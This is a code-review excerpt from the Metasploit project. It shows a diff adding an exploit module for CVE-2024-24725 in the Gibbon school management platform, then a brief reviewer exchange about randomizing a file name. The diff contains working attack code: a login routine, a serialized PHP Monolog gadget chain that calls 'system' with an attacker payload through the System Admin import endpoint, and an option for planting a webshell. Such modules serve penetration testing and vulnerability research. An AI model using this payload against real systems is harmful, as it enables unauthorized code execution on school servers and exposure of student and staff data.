modules/exploits/multi/http/gibbon_auth_rce_cve_2024_24725.rb

```diff
@@ -0,0 +1,248 @@
+        'DefaultOptions' => {
+          'SSL' => true,
+          'RPORT' => 443
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options([
+      OptString.new('TARGETURI', [ true, 'The Gibbon online school platform endpoint URL', '/' ]),
+      OptString.new('WEBSHELL', [false, 'Set webshell name without extension. Name will be randomly generated if left unset.', nil]),
+      OptString.new('USERNAME', [true, 'Gibbon username to login, typically an e-mail address', nil]),
+      OptString.new('PASSWORD', [true, 'Password', nil])
+    ])
+  end
+
+  def gibbon_login
+    # construct multipart login form data
+    form_data = Rex::MIME::Message.new
+    form_data.add_part('', nil, nil, 'form-data; name="address"')
+    form_data.add_part('default', nil, nil, 'form-data; name="method"')
+    form_data.add_part(datastore['USERNAME'].to_s, nil, nil, 'form-data; name="username"')
+    form_data.add_part(datastore['PASSWORD'].to_s, nil, nil, 'form-data; name="password"')
+    form_data.add_part('025', nil, nil, 'form-data; name="gibbonSchoolYearID"')
+    form_data.add_part('0002', nil, nil, 'form-data; name="gibboni18nID"')
+
+    return send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'login.php?timeout=true'),
+      'keep_cookies' => true,
+      'ctype' => "multipart/form-data; boundary=#{form_data.bound}",
+      'data' => form_data.to_s
+    })
+  end
+
+  def construct_form_data(payload)
+    # construct multipart form data with payload
+    payload_len = payload.length
+    payload_data = "a:2:{i:7;O:32:\"Monolog\\Handler\\SyslogUdpHandler\":1:{s:9:\"\x00*\x00socket\";O:29:\"Monolog\\Handler\\BufferHandler\":7:{s:10:\"\x00*\x00handler\";r:3;s:13:\"\x00*\x00bufferSize\";i:-1;s:9:\"\x00*\x00buffer\";a:1:{i:0;a:2:{i:0;s:#{payload_len}:\"#{payload}\";s:5:\"level\";N;}}s:8:\"\x00*\x00level\";N;s:14:\"\x00*\x00initialized\";b:1;s:14:\"\x00*\x00bufferLimit\";i:-1;s:13:\"\x00*\x00processors\";a:2:{i:0;s:7:\"current\";i:1;s:6:\"system\";}}}i:7;i:7;}"
+
+    form_data = Rex::MIME::Message.new
+    form_data.add_part('/modules/System Admin/import_run.php', nil, nil, 'form-data; name="address"')
+    form_data.add_part('sync', nil, nil, 'form-data; name="mode"')
+    form_data.add_part('N', nil, nil, 'form-data; name="syncField"')
+    form_data.add_part('', nil, nil, 'form-data; name="syncColumn"')
+    form_data.add_part(payload_data.to_s, nil, nil, 'form-data; name="columnOrder"')
+    form_data.add_part('N;', nil, nil, 'form-data; name="columnText"')
+    form_data.add_part('%2C', nil, nil, 'form-data; name="fieldDelimiter"')
+    form_data.add_part('%22', nil, nil, 'form-data; name="stringEnclosure"')
+    form_data.add_part('DataStructure-externalAssessment.xlsx', nil, nil, 'form-data; name="filename"')
```

Comment:
Would it be possible to randomize this file name or does this particular name need to be used for the exploit?

Reply:
Yep, that works. See https://github.com/rapid7/metasploit-framework/pull/19044/commits/8afbbc15535b667608dce0ed2e0ad5727097b6d3.